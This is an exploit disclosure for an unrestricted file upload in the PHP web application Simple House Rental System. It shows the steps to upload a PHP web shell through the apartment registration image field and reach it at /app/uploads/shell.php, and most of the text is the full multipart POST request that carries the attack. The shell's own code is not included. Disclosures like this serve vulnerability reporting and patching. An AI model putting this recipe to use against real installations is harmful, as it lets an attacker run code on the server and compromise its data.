# Simple House Rental System Unrestricted File Upload + RCE # Author: D4rkP0w4r * Note => login to client, don't need login to admin * Description => Login to client => Upload web shell at Image # Step to Reproduct * Login to client -> Register -> Apartment Registration -> Image -> Submit # Exploit * Upload web shell at Image * When upload success access /app/uploads/shell.php * Web shell active # Vulnerable Code * No file checking before uploading # POC * Injection Point ------WebKitFormBoundarySn3eV71wUmAMRV4e Content-Disposition: form-data; name="image"; filename="shell.php" Content-Type: application/octet-stream ``` * Request ```c POST /SimpleHouseRental_PHP/app/register.php HTTP/1.1 Host: localhost:8080 Content-Length: 179829 Cache-Control: max-age=0 sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://localhost:8080 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySn3eV71wUmAMRV4e User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost:8080/SimpleHouseRental_PHP/app/register.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=1qok9ei0dral0qkos2ckaq36lr Connection: close ------WebKitFormBoundarySn3eV71wUmAMRV4e Content-Disposition: form-data; name="apartment_name" root ------WebKitFormBoundarySn3eV71wUmAMRV4e Content-Disposition: form-data; name="mobile" 1234567890 ------WebKitFormBoundarySn3eV71wUmAMRV4e Content-Disposition: form-data; name="alternat_mobile" 1234567890 ------WebKitFormBoundarySn3eV71wUmAMRV4e Content-Disposition: form-data; name="email" haha@gmail.com ------WebKitFormBoundarySn3eV71wUmAMRV4e Content-Disposition: form-data; name="plot_number" 10 ------WebKitFormBoundarySn3eV71wUmAMRV4e Content-Disposition: form-data; name="country" USA ------WebKitFormBoundarySn3eV71wUmAMRV4e Content-Disposition: form-data; name="state" Newyork ------WebKitFormBoundarySn3eV71wUmAMRV4e Content-Disposition: form-data; name="city" Newyork ------WebKitFormBoundarySn3eV71wUmAMRV4e Content-Disposition: form-data; name="landmark" 10 ------WebKitFormBoundarySn3eV71wUmAMRV4e Content-Disposition: form-data; name="address" 23/2/2 ------WebKitFormBoundarySn3eV71wUmAMRV4e Content-Disposition: form-data; name="image"; filename="shell.php" Content-Type: application/octet-stream ------WebKitFormBoundarySn3eV71wUmAMRV4e Content-Disposition: form-data; name="register_apartment" register_apartment ------WebKitFormBoundarySn3eV71wUmAMRV4e-- * POC VIDEO https://drive.google.com/file/d/1ZmGyRo9Ah8w3NQF93vsYEj4JQExyVT7Z/view?usp=sharing